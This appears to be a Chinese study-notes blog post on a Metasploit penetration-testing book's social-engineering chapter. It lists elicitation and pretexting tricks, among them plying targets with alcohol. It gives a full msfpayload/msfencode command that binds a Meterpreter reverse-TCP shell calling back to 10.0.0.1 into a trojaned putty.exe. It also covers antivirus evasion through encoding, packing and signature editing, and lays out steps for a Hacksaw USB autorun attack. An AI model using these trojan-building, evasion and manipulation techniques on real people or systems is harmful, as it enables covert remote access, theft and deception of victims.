《metasploit滲透測試魔鬼訓練營》學習筆記第七章--社會工程學
阿新 • • 發佈:2019-02-12
五.社工工程學
5.1社會工程系框架
5.1.1資訊蒐集
maltego是一個高度自動化的資訊蒐集工具,整合在BT5中,如果國內網路環境使用時無法獲取結果,可能是無法與資訊提供網站建立連線,可以使用VPN或代理伺服器。
5.1.2誘導
1.提高誘導能力
表現自然,學習知識,不要貪心。
2.成功誘導的技巧
迎合目標的自我感覺
表達共同的興趣
故意給出一個錯誤的陳述
丟擲一些誘餌資訊以尋求回報
假裝知曉
藉助酒精的威力,讓目標更容易開口
3.問答的種類
開放式問答:無法只用“是”或“否”來回答問題
封閉式問答:回答比較確定
誘導性問答:組合了開放式和封閉式,期望誘匯出一些回答資訊
假設性問答:假設目標已經知曉某種資訊
5.1.3託辭
設計一個虛構的場景來說服目標洩露資訊。
1.提升設計託辭的能力
託辭的質量與資訊蒐集和誘導得到的資訊密切相關。實踐,實踐!
2.設計託辭的原則
研究功課做得越充分,成功的概率越大
發揮你的個人興趣或專長
聯習方言和表達
充分利用電話
託辭設計越簡單越好
讓託辭看起來更自然
向目標提供一個合乎邏輯的結論。
5.2社會工程學案例--偽裝木馬
木馬常見的偽裝方式:
偽裝成不可執行檔案的圖示
捆綁檔案偽裝
組合偽裝
5.2.1木馬程式的製作
製作一個木馬,主要考慮以下三點:
①確定監聽的IP和埠,木馬需要回連這個IP的埠。
②把木馬綁到一個合法程式上。
③木馬植入後,遷移到不會關閉的程序上。
還要考慮木馬的穩定性,相容性,免殺等等。
1.使用metasploit中的msfpayload功能生成基本的攻擊載荷程式
msfpayload -l |grep 'windows'|grep ‘reverse_tcp’|grep 'meterpreter'
-l用來列出攻擊載荷,grep命令來查詢所需要的攻擊載荷模組。
在實際應用中建議修改回連監聽埠為80,53等常用埠。
2.將攻擊載荷繫結到Putty程式
msfpayload主要功能是將payload包裝成一個可執行檔案,或包裝指定格式輸出。用法如下:
執行msfpayload -h檢視都有哪些引數:
Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>
OPTIONS:
-h Help banner
-l List available payloads
#O--檢視payload資訊
#R--輸出raw原始資料,可以被傳輸到另一個程式如msfencode或重定向到另一個檔案
#C--輸出c程式
msfencode主要功能是對輸入的資料繼續編碼,然後將編碼後的資料包裝成一個指定檔案。用法如下:
Usage: /opt/metasploit/msf3/msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff' //避免的字元
-c <opt> The number of times to encode the data //編碼次數
-d <opt> Specify the directory in which to look for EXE templates
-e <opt> The encoder to use //選擇使用哪種編碼器
-h Help banner
-i <opt> Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders //列出所有可用的編碼器
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file //輸出檔案
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war //輸出檔案的格式
-v Increase verbosity
-x <opt> Specify an alternate executable template
3.製作木馬程式
msfpayload /windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=80 R | msfencode -t exe -e x86/alpha_mixed -k -x /root/netcat/putty.exe -t elf -o dood_putty.exe -c 5
新生成的door_putty.exe就是木馬後門了。
5.2.2木馬的免殺處理
1.加密免殺
可以使用多重編碼技術增強偽裝木馬的免殺能力,但是複雜的組合可能導致編碼後的程式無法正常執行
2.加殼免殺
可以使用一些加殼工具對惡意程式碼進行加殼處理,比如UPX等
3.修改特徵碼免殺
大部分防毒軟體的根據就是對比特徵碼,對比硬碟中儲存的檔案的特徵碼,能全面地查殺,對比在記憶體中儲存的檔案特徵碼,可以快速的查殺,針對這一特性,可以用特徵碼定位軟體定位檔案特徵碼的所在之處,在用UltraEdit對被修改的特徵碼進行修改。一般的修改方法有:
十六進位制的資料特徵碼直接修改法
字串大小寫修改法
等價替換法 把對應的彙編指令替換成功能類似的指令
指令順序調換法
通用跳轉法
修改特徵碼的方法針對性很強,但只能針對一款防毒軟體,因為各家防毒軟體的特徵碼不一樣。
5.3社工攻擊工具包SET
可進行製作釣魚網站,釣魚郵件等等,功能強大,
5.4U盤 Hacksaw攻擊
向U盤寫入木馬程式,然後修改autorun.inf檔案,讓其指向木馬安裝程式,那麼windows會執行這個程式。
一些隱藏木馬的方式:
作為系統檔案隱藏
偽裝成其他檔案
藏於系統資料夾中
運用windows漏洞建立路徑不存在或者打不開的資料夾
製作Hacksaw U盤
Hacksaw是使用U盤進行攻擊的軟體,具體步驟如下:
1.下載安裝工具UltraISO
2.下載Hcaksaw
3.解壓下載的壓縮包到一個單獨目錄
4.插入U盤
5.啟動UltraISO,並開啟先前解壓後目錄下的cruzer-autorun.iso
6.點選啟動,寫入硬碟映像
7.選擇U盤並寫入
8.把payload目錄下的隱藏木馬WIP及攻擊載荷複製到準備好的U盤的跟目錄下
9.修改WIP/SBS目錄下的send.sat檔案
10.需要autorun.inf檔案 把shellexecute替換open
11.升級stunnel軟體
12.把autorun.inf和go.vbe修改為隱藏檔案